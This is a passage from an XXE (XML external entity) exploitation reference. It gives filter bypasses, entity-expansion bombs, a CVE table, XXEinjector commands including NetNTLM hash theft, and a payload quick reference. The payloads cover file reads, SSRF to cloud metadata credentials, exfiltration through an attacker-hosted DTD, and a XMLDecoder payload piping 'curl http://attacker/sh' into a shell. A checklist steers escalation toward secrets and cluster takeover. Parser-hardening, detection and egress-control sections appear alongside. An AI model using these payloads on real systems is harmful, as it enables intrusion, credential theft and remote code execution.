|---|---|
| file:///etc/passwd | netdoc:///etc/passwd (Java) |
| file:// | jar:file:/// |
| http:// | https://, ftp://, gopher:// |
| SYSTEM keyword filtered | PUBLIC "-//W3C//DTD..." "URI" (PUBLIC identifiers also trigger fetches) |
12.3 data:// smuggling#
<!DOCTYPE r [<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init;]><r/>
If the parser resolves data: URIs, the base64 inside decodes at parse time and effectively imports an arbitrary DTD payload past string-based filters.
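Building such a URI is a one-liner. The sketch below reproduces the `data://text/plain;base64,` form used in the payload above; `dtd_to_data_uri` is an illustrative name, and whether a given parser accepts this scheme at all is an assumption to verify per target.

```python
import base64


def dtd_to_data_uri(dtd_text):
    """Pack DTD text into a base64 data: URI in the same form as the payload above."""
    encoded = base64.b64encode(dtd_text.encode("utf-8")).decode("ascii")
    return "data://text/plain;base64," + encoded


if __name__ == "__main__":
    print(dtd_to_data_uri("file:///etc/passwd"))
```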
12.4 Nested general-entity bypass via HTML entities#
From Ambrotd/XXE-Notes — obfuscate the inner ENTITY so regex filters on SYSTEM and % don’t match:
<!DOCTYPE foo [
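<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x20;&#x25;&#x20;&#x64;&#x74;&#x64;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x20;&#x22;http://a/e.dtd&#x22;&#x3E;">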
%a;%dtd;
]>
<data><env>&exfil;</env></data>
12.5 WrapWrap / Lightyear PHP tricks#
Swarm’s “Impossible XXE in PHP” demonstrated php://filter chains (convert.iconv.*) that bypass strict <?xml / <!DOCTYPE byte filters by generating the required bytes through iconv transformations inside the filter chain itself. Highly situational, but effective when the simpler bypasses fail.
13. Denial of Service#
13.1 Billion Laughs#
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>
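The classic payload continues this pattern up to lol9: nine levels of tenfold nesting produce 10⁹ copies of "lol", roughly 3 GB of text once expanded. The four levels shown here already expand to 10⁴ copies.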
13.2 Quadratic blowup#
One giant entity ("A" * 100000) referenced 10,000 times. Bypasses entityExpansionLimit in some parsers because it’s a single entity.
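The arithmetic behind both variants is simple enough to verify directly. The function names below are illustrative; sizes are counted in characters of expanded text, which equals bytes for ASCII payloads.

```python
def billion_laughs_size(levels, fanout=10, seed="lol"):
    """Characters produced when the top entity of a nested chain is fully expanded."""
    return len(seed) * fanout ** levels


def quadratic_blowup_size(entity_length, references):
    """Characters produced by one long entity referenced many times."""
    return entity_length * references


if __name__ == "__main__":
    print(billion_laughs_size(4))                   # the lol4 payload shown above
    print(billion_laughs_size(9))                   # the full nine-level chain
    print(quadratic_blowup_size(100_000, 10_000))   # one 100,000-character entity
```

The nested chain reaches gigabytes from a payload of under a kilobyte, while the quadratic variant needs a payload of roughly 200 KB to reach a comparable size.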
13.3 External resource DoS#
<!ENTITY x SYSTEM "http://slowloris.internal/never-closes">
<!ENTITY y SYSTEM "file:///dev/urandom">
<!ENTITY z SYSTEM "file:///dev/zero">
Each forces the server thread to hang — cheap resource exhaustion.
13.4 YAML variant (“Billion Lols” in YAML)#
YAML anchors/aliases have the same problem. Any parser that re-dereferences aliases recursively is vulnerable. A comparable case on the XML side: Visual Studio 2022 consumed 100 GB of RAM on a crafted XAML file (XEE, XML Entity Expansion).
14. Real-World CVEs & Chains#
| CVE | Product | Notes |
|---|---|---|
| CVE-2014-3660 | libxml2 | Entity expansion amplification fix |
| CVE-2017-10271 | Oracle WebLogic | wls-wsat XMLDecoder → unauth RCE |
| CVE-2018-1000840 | Apache Batik | SVG xlink:href="file://" disclosure |
| CVE-2019-17571 | Apache log4j 1.2 SocketServer | Deserialization of untrusted Java objects (not XML-based) |
| CVE-2020-5245 | dropwizard-validation | EL injection in the self-validating feature → RCE (not XXE) |
| CVE-2021-33813 | JDOM | SAXBuilder external DTD |
| CVE-2021-34429 | Eclipse Jetty | WEB-INF content disclosure via encoded URI characters (not XXE) |
| CVE-2022-1471 | SnakeYAML (XEE cousin) | tag-based RCE via typed deserialisation |
| CVE-2023-34034 | Spring Security | WebFlux "**" pattern mismatch → authorization bypass (not XXE) |
| CVE-2024-22257 | Spring Security | Broken access control in AuthenticatedVoter (not XXE) |
| CVE-2025-27136 | LocalS3 (Java S3 emulator) | DocumentBuilderFactory default → unauth file read on CreateBucketConfiguration |
| CVE-2025-49493 | Akamai CloudTest | XXE in test-case import allowing file read |
| CVE-2025-68493 | Apache Struts | XXE in action XML configuration parsing |
| CVE-2026-29924 | Grav CMS ≤ 1.7.x | Admin-panel SVG upload → authenticated XXE, file read + SSRF |
| Cisco ISE | Identity Services Engine | XXE in external-identity integration XML |
| Xerox FreeFlow Core | JMF listener on :4004 | DOCTYPE allowed → unauth SSRF + path traversal → RCE |
| Horizon3 “Support Ticket to 0-day” | FreeFlow Core | Full exploit chain write-up: XXE → SSRF → path traversal → RCE |
14.1 Honoki — blind XXE to root file read#
Creative chain: OOB XXE used to enumerate /proc/self/environ, leaked a service credential, which unlocked a privileged endpoint that returned the filesystem root. Illustrates that initial “boring” file read often unlocks higher-privilege primitives.
14.2 Bugcrowd / H1 patterns#
Recurring paid reports:
- SVG avatar → XXE file read on Rails / Node image processors.
- DOCX import → blind OOB XXE on HR/ATS platforms.
- SAML metadata upload → admin-role XXE on Okta-competitor SSO.
- XLSX bulk-import → XXE reading /proc/self/environ → DB credential disclosure.
15. Tooling#
15.1 XXEinjector (Ruby)#
Automates direct + OOB exploitation. Highlights:
- OOB methods: FTP (default), HTTP, gopher (Java ≤ 1.7).
- Directory enumeration (Java) or file brute-forcing (any).
- Second-order: sends the XXE in one request, reads it back from a second.
- --phpfilter auto-wraps reads in php://filter/convert.base64-encode.
- --hashes triggers SMB to steal NetNTLMv2.
- --expect uses PHP expect wrapper for RCE.
- --upload uses jar: to drop files in temp dir.
- --xslt tests for XSLT injection.
ruby XXEinjector.rb --host=10.0.0.2 --path=/etc --file=req.txt --oob=http
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --phpfilter --brute=files.txt
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --hashes
15.2 XXExploiter (Node/TS — luisfontes19)#
Generates payloads and serves the companion HTTP/FTP infrastructure in one go. Useful when you don’t want to stand up separate listeners.
15.3 BuffaloWill/oxml_xxe#
Embeds XXE payloads into DOCX/XLSX/SVG/GPX/XMP/EPUB/IDML/PDF/HWP wrappers automatically. One-click for file-format vectors.
15.4 GoSecure dtd-finder#
java -jar dtd-finder.jar target-image.tar
Scans Docker images / tarballs for DTD files and identifies overridable entities — indispensable for error-based local-DTD attacks.
15.5 defusedxml (Python)#
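Defensive. Provides hardened drop-in replacements for xml.etree, xml.sax, xml.dom and xmlrpc that reject entity declarations, external references, and entity-expansion bombs; DOCTYPE itself is rejected only when forbid_dtd=True is passed. Its lxml wrapper is deprecated. Use in any Python codebase handling untrusted XML.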
15.6 Burp Suite extensions#
- Content Type Converter — flip JSON requests to XML/YAML.
- HackVertor — tag-based encoding for rapid payload mutation.
- XXE-Hunter — auto-detect XXE in requests with XML bodies.
- Reissue Request Scripter — build Python scripts for iterative XXE file reads.
- Burp Collaborator — essential OOB endpoint.
15.7 OOB infrastructure#
- Burp Collaborator (paid).
- interact.sh / interactsh-client from ProjectDiscovery (free).
- canarytokens.org for one-shot DNS tokens.
- Dummy FTP for password-channel exfil: ONsec xxe-ftp-server.rb.
- slow_http_server.py / slowserver.jar for jar: chain abuse.
16. Detection & Prevention#
16.1 Static analysis patterns#
Search for any XML parser instantiation not accompanied by hardening flags:
Java DocumentBuilderFactory.newInstance() # without setFeature hardening
SAXParserFactory.newInstance()
TransformerFactory.newInstance()
SchemaFactory.newInstance()
XMLInputFactory.newFactory()
SAXReader # dom4j
SAXBuilder # jdom2
java.beans.XMLDecoder # RCE risk
.NET new XmlDocument() # check .XmlResolver assignments
new XmlTextReader(...) # check .DtdProcessing & .XmlResolver
new XmlReaderSettings { DtdProcessing = DtdProcessing.Parse }
XmlSerializer.Deserialize(stream)
Python lxml.etree.XMLParser(load_dtd=True)
lxml.etree.XMLParser(resolve_entities=True)
xml.sax.make_parser() # use defusedxml instead
xml.dom.pulldom / xml.etree # inspect parser flags
PHP simplexml_load_string($x, null, LIBXML_NOENT | LIBXML_DTDLOAD)
DOMDocument::loadXML($x, LIBXML_NOENT)
libxml_disable_entity_loader(false) # explicit re-enable
Ruby Nokogiri::XML(input) { |c| c.noent.dtdload }
REXML::Document.new(input)
Node new xmldom.DOMParser() # check for entityExpansionLimit
xml2js.parseString(..., { explicitCharkey: true })
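A crude version of this search can be automated. The sketch below is a file-level heuristic, not a real static analyser: the `RULES` table covers only a handful of the patterns listed above, and both the rule names and the choice of hardening markers are assumptions made for illustration.

```python
import re

# Risky sink pattern -> hardening marker expected somewhere in the same file.
# A marker of None means the sink is reported whenever it appears.
RULES = {
    "java": (r"DocumentBuilderFactory\.newInstance\(\)", "disallow-doctype-decl"),
    "dotnet": (r"new\s+XmlTextReader\(", "DtdProcessing.Prohibit"),
    "python": (r"XMLParser\([^)]*(load_dtd|resolve_entities)\s*=\s*True", None),
    "php": (r"LIBXML_NOENT", None),
}


def audit_source(text):
    """Return the rule names whose sink appears without its hardening marker."""
    findings = []
    for name, (sink, marker) in RULES.items():
        if re.search(sink, text) and (marker is None or marker not in text):
            findings.append(name)
    return findings


if __name__ == "__main__":
    sample = "DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();"
    print(audit_source(sample))
```

Because the marker check is per file rather than per parser instance, a hit is a prompt for manual review, and a clean result proves nothing.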
16.2 Secure-by-default recipes#
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
.NET ≥ 4.5.2:
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};
using var reader = XmlReader.Create(stream, settings);
Python:
from defusedxml import ElementTree as ET # rejects entity declarations and external references by default; pass forbid_dtd=True to reject any DOCTYPE
root = ET.fromstring(xml_bytes)
or native lxml:
parser = lxml.etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False,
dtd_validation=False,
huge_tree=False,
)
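Where neither defusedxml nor lxml is available, the same "no DOCTYPE at all" policy can be approximated with the standard library. This is a minimal sketch under that assumption: `parse_without_dtd` and `DoctypeForbidden` are hypothetical names, and the approach is a pre-scan with expat that raises as soon as a DOCTYPE declaration starts, before the document is handed to ElementTree.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input carries a DOCTYPE declaration."""


def parse_without_dtd(xml_bytes):
    """Parse XML with ElementTree, refusing any document that declares a DOCTYPE."""

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # expat calls this handler when it reaches <!DOCTYPE ...>.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = reject_doctype
    scanner.Parse(xml_bytes, True)  # the handler's exception propagates from here

    # Only DOCTYPE-free documents reach the real parser.
    return ET.fromstring(xml_bytes)
```

The document is parsed twice, which is acceptable for small request bodies; for large inputs a library-level option such as defusedxml's `forbid_dtd=True` is the better fit.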
PHP (modern):
$doc = new DOMDocument();
$doc->loadXML($xml); // PHP 8+ (libxml ≥ 2.9): external entity loading is off by default; a DOCTYPE is still parsed
Avoid LIBXML_NOENT and LIBXML_DTDLOAD unless absolutely required.
Ruby / Nokogiri:
Nokogiri::XML(input) # safe defaults; do not add .noent or .dtdload
16.3 Network & runtime defences#
- Egress-filter the app server: block 169.254.169.254 and arbitrary outbound HTTP from parser contexts (file:// reads stay on the host, so egress rules do not cover them).
- IMDSv2 (AWS): force HttpTokens=required.
- Container egress: default-deny, allowlist specific hostnames only.
- WAF rules that block <!DOCTYPE / <!ENTITY on non-XML endpoints and strip them on XML endpoints that don’t need DTD.
- Suppress detailed parser errors in production responses (kills error-based variants).
- Sandbox file-format processors (ImageMagick policy.xml, LibreOffice profile, SVG rasterisers) in containers without filesystem/network access.
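Error suppression is the cheapest of these controls to show in code. The sketch below assumes a hypothetical request handler, `parse_request_body`, that returns a status code and a payload: the parser's message goes to the server log only, and the client gets a fixed string, so an error-based payload has nothing to reflect its data through.

```python
import logging
import xml.etree.ElementTree as ET

log = logging.getLogger("xml_ingest")  # hypothetical logger name


def parse_request_body(xml_bytes):
    """Return (status_code, payload) without echoing parser messages to the client."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        # Full detail stays server-side, where it also serves as a detection signal.
        log.warning("XML parse failure: %s", exc)
        return 400, {"error": "invalid XML"}
    return 200, {"root": root.tag}
```

The same shape applies to any framework: catch the parser's exception type at the boundary and map it to a constant response body.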
16.4 Logging / detection signals#
- XML parser error logs mentioning external entity, SYSTEM, DOCTYPE.
- Outbound DNS/HTTP from application servers to unknown domains.
- Requests that include <!DOCTYPE on endpoints that historically received pure-data XML.
- Access to /proc/self/environ, /etc/passwd, /root/.ssh/ by parser processes.
- Sudden spikes in heap / CPU: possible billion-laughs.
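The request-level signals above can be prototyped as a small tagger over captured request bodies. This is a sketch under stated assumptions: `SIGNALS` and `xxe_signals` are hypothetical names, the patterns are a starting point rather than a complete rule set, and matching on raw bytes misses alternate encodings such as the UTF-7 form in 17.15.

```python
import re

# Byte-level patterns so the tagger can run on raw request bodies.
SIGNALS = {
    "doctype": re.compile(rb"<!DOCTYPE"),
    "entity_decl": re.compile(rb"<!ENTITY"),
    "system_id": re.compile(rb"\bSYSTEM\s+[\"']"),
    "sensitive_path": re.compile(rb"/proc/self/environ|/etc/passwd|/root/\.ssh/"),
}


def xxe_signals(body):
    """Return the names of all signals that match the given request body."""
    return [name for name, pattern in SIGNALS.items() if pattern.search(body)]
```

Feeding the result into an existing log pipeline (for example, one field per signal) makes it easy to alert on endpoints that suddenly start receiving DOCTYPE declarations.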
16.5 Test checklist#
- Send <!DOCTYPE r [<!ENTITY x "test">]><r>&x;</r>: does test appear? Entities enabled.
- Send OOB probe with Collaborator: do callbacks land? External resolution enabled.
- Send parameter-entity probe: does the remote DTD get fetched? PE expansion enabled.
- Send classic file read: is content reflected?
- Send FTP/HTTP exfil via remote DTD: is data captured?
- Send error payload with bad path: does response include filename fragment?
- Send jar: probe (Java): does temp file appear?
- Send billion-laughs with low iteration: does the service degrade? Back off if yes.
- File-format wrappers: SVG avatar, DOCX upload, SAML metadata, RSS feed import.
- JSON→XML swap on every JSON endpoint that returns data.
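The first item of the checklist is easy to automate against your own parsing code in a unit test. The sketch below is one way to do it, assuming a hypothetical helper `internal_entity_check` that takes any callable accepting bytes and returning an element-like object with a `.text` attribute.

```python
import xml.etree.ElementTree as ET

# Same probe as the first checklist item.
PROBE = b'<!DOCTYPE r [<!ENTITY x "test">]><r>&x;</r>'


def internal_entity_check(parse):
    """Classify a parse callable by how it handles an internal entity."""
    try:
        root = parse(PROBE)
    except Exception as exc:  # a hardened parser is expected to raise here
        return f"rejected ({type(exc).__name__})"
    if (root.text or "") == "test":
        return "entities enabled"
    return "not expanded"


if __name__ == "__main__":
    # The stdlib parser expands internal entities.
    print(internal_entity_check(ET.fromstring))
```

A result of "entities enabled" only confirms DTD processing. It says nothing yet about external resolution, which the later checklist items cover.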
17. Payload Quick Reference#
17.1 Detection probes#
<!-- Local entity round-trip -->
<!DOCTYPE r [<!ENTITY t "entity-works">]><r>&t;</r>
<!-- OOB via general entity -->
<!DOCTYPE r [<!ENTITY p SYSTEM "http://COLLAB/g">]><r>&p;</r>
<!-- OOB via parameter entity (catches stricter parsers) -->
<!DOCTYPE r [<!ENTITY % p SYSTEM "http://COLLAB/p"> %p;]><r/>
17.2 File read#
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///c:/windows/win.ini">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///proc/self/environ">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "netdoc:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "jar:file:///tmp/a.jar!/b.txt">]><r>&x;</r>
17.3 SSRF#
<!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://127.0.0.1:6379/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://[::1]/">]><r>&x;</r>
17.4 Blind OOB external DTD#
Victim:
<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://ATTACKER/evil.dtd"> %dtd;]><r/>
evil.dtd (HTTP channel):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER/?x=%file;'>">
%wrap;
%exfil;
evil.dtd (FTP channel for multiline files):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'ftp://a:%file;@ATTACKER/'>">
%wrap;
%exfil;
17.5 Error-based (external DTD)#
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///nope/%file;'>">
%eval;
%err;
17.6 Error-based (local DTD — GNOME yelp)#
<!DOCTYPE r [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; err SYSTEM &#x27;file:///nope/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;err;
'>
%local_dtd;
]>
<r/>
17.7 lxml meow:// bypass#
<!DOCTYPE r [
<!ENTITY % a '
<!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
<!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
'>
%a; %b;
]>
<r>&c;</r>
17.8 XInclude#
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
17.9 SVG upload#
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="40">
<text y="20">&x;</text>
</svg>
17.10 SOAP#
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<payload><![CDATA[<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>]]></payload>
</soap:Body>
</soap:Envelope>
17.11 PHP RCE via expect#
<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]><r>&x;</r>
17.12 Java XMLDecoder RCE#
<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>curl http://attacker/sh|sh</string></void>
</array>
<void method="start"/>
</object>
</java>
17.13 Windows NetNTLMv2 capture#
<!DOCTYPE r [<!ENTITY x SYSTEM "file:////ATTACKER-IP/share/a.jpg">]><r>&x;</r>
17.14 Billion laughs#
<!DOCTYPE lolz [
<!ENTITY a0 "lol">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<lolz>&a4;</lolz>
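The growth is plain exponentiation: each level multiplies the previous one by the number of references it contains. A small worked calculation, using a hypothetical helper `expanded_size`, shows why the four-level payload above is a safe low-iteration probe while the classic nine-level version is not.

```python
def expanded_size(levels, fanout=10, base_len=3):
    """Characters produced when the top-level entity is fully expanded.

    levels   -- number of nested entities above the base string (a1..a4 -> 4)
    fanout   -- references to the previous level inside each entity
    base_len -- length of the innermost literal ("lol" -> 3)
    """
    return base_len * fanout ** levels


if __name__ == "__main__":
    print(expanded_size(4))  # payload above: 3 * 10**4 = 30000 characters
    print(expanded_size(9))  # classic nine-level variant: 3 * 10**9 characters
```

For defensive limits, the same formula gives the worst-case expansion a parser must tolerate for a given nesting depth and document size.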
17.15 UTF-7 encoded DOCTYPE#
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
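A keyword filter that inspects raw bytes never sees `<!DOCTYPE` in this form, because the markup characters are base64-encoded inside the UTF-7 shift sequences. The sketch below shows the defensive counterpart: decode using the encoding the document declares, then inspect. The helper names `decode_declared` and `contains_doctype` are hypothetical, and a production filter would more likely reject any declared encoding outside a short allowlist.

```python
import re

# Reads the encoding pseudo-attribute from an ASCII-compatible XML declaration.
ENCODING_RE = re.compile(rb'^<\?xml[^>]*encoding=["\']([A-Za-z0-9._-]+)["\']')

# The payload from this section, as raw bytes on the wire.
RAW = (
    b'<?xml version="1.0" encoding="UTF-7"?>\n'
    b"+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM "
    b"+ACI-file:///etc/passwd+ACI +AD4AXQA+\n"
    b"+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4"
)


def decode_declared(raw):
    """Decode raw XML bytes with the declared encoding (UTF-8 if none is declared)."""
    match = ENCODING_RE.match(raw)
    encoding = match.group(1).decode("ascii") if match else "utf-8"
    return raw.decode(encoding)  # unknown encodings raise LookupError


def contains_doctype(raw):
    """Check for a DOCTYPE after normalising the encoding."""
    return "<!DOCTYPE" in decode_declared(raw)


if __name__ == "__main__":
    print(b"<!DOCTYPE" in RAW)    # byte-level match misses it
    print(contains_doctype(RAW))  # visible after decoding
```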
Appendix A — High-value local DTDs#
| OS / Package | Path | Overridable entity |
|---|---|---|
| GNOME yelp | /usr/share/yelp/dtd/docbookx.dtd | ISOamso, ISOnum |
| fontconfig | /usr/share/xml/fontconfig/fonts.dtd | constant |
| Xalan (Java) | xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties | various |
| IBM WebSphere | $WAS/properties/schemas/j2ee/XMLSchema.dtd | WebSphere-specific |
| Microsoft | C:\Windows\System32\wbem\xml\cim20.dtd | SuperClass |
| Red Hat / CentOS | /usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd | — |
| Tomcat | jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd | — |
Full list: https://github.com/GoSecure/dtd-finder/tree/master/list
Appendix B — Fingerprinting checklist before escalating#
- Does the target reflect XML? → test in-band file read.
- Does the parser fetch remote DTDs? → OOB exfil.
- Does it return parser errors? → error-based.
- Egress-filtered? → local-DTD error-based.
- Java fingerprint (Server header, cookie, error trace)? → jar:, netdoc:, XMLDecoder, XSLT RCE.
- PHP fingerprint? → php://filter, expect://.
- .NET fingerprint? → check XmlResolver / DtdProcessing code patterns; pre-4.5.2 is default-vulnerable.
- File-upload feature? → SVG / DOCX / XLSX / SAML / RSS wrapper.
- Windows host? → SMB NetNTLM hash capture.
- Is the XML in a privileged context (root, cloud IAM, K8s service account)? → pivot to secrets, cloud creds, cluster takeover.
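The checklist above is a lookup from observation to next technique, which makes it easy to encode for report templates or triage notes. A minimal sketch follows, with hypothetical flag names and a hypothetical `next_steps` helper. The step strings are copied from the checklist, and the .NET and privileged-context items are left out because they lead to review actions rather than a technique.

```python
# (observation flag, next technique) pairs in checklist order.
PLAYBOOK = [
    ("reflects_xml", "in-band file read"),
    ("fetches_remote_dtd", "OOB exfil"),
    ("returns_parser_errors", "error-based"),
    ("egress_filtered", "local-DTD error-based"),
    ("java", "jar:, netdoc:, XMLDecoder, XSLT RCE"),
    ("php", "php://filter, expect://"),
    ("file_upload", "SVG / DOCX / XLSX / SAML / RSS wrapper"),
    ("windows", "SMB NetNTLM hash capture"),
]


def next_steps(observations):
    """Return the techniques worth testing, in checklist order."""
    return [step for flag, step in PLAYBOOK if flag in observations]


if __name__ == "__main__":
    for step in next_steps({"php", "reflects_xml"}):
        print(step)
```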
References#
Key source articles (from raw/XXE/):
- HackTricks — XXE / XEE / XML External Entity (definitive cheat sheet).
- GoSecure — Advanced XXE Exploitation workshop.
- PortSwigger — Blind XXE labs and writeups.
- PVS-Studio — XXE in C# applications (parser defaults, BlogEngine.NET case).
- OWASP — XML External Entity Prevention Cheat Sheet.
- Detectify Labs — Obscure XXE attacks (Office Open XML).
- honoki.net — From blind XXE to root-level file read.
- Horizon3.ai — From support ticket to zero day (Xerox FreeFlow Core JMF XXE → SSRF → RCE).
- OffSec — CVE-2025-27136 LocalS3 XXE.
- pwn.vg — Local file read via error-based XXE (XLIFF).
- YesWeHack — Bug bounty XXE guide + Dojo CTF #42 write-up.
- HackerOne / Bugcrowd — XXE complete guide.
- HLOverflow — XXE-study apps (PHP vulnerable server source).
- enjoiz — XXEinjector (Ruby automation).
- luisfontes19 — xxexploiter (TS payload + server).
- BuffaloWill — oxml_xxe (file-format wrapper generator).
- GoSecure — dtd-finder (local-DTD discovery).
- Swarm / PT Security — Impossible XXE in PHP (WrapWrap / Lightyear bypass).
- Cisco / Akamai / Apache / Grav — vendor advisories for real CVEs referenced above.
Compiled for defensive security research, variant hunting, and secure-code review reference.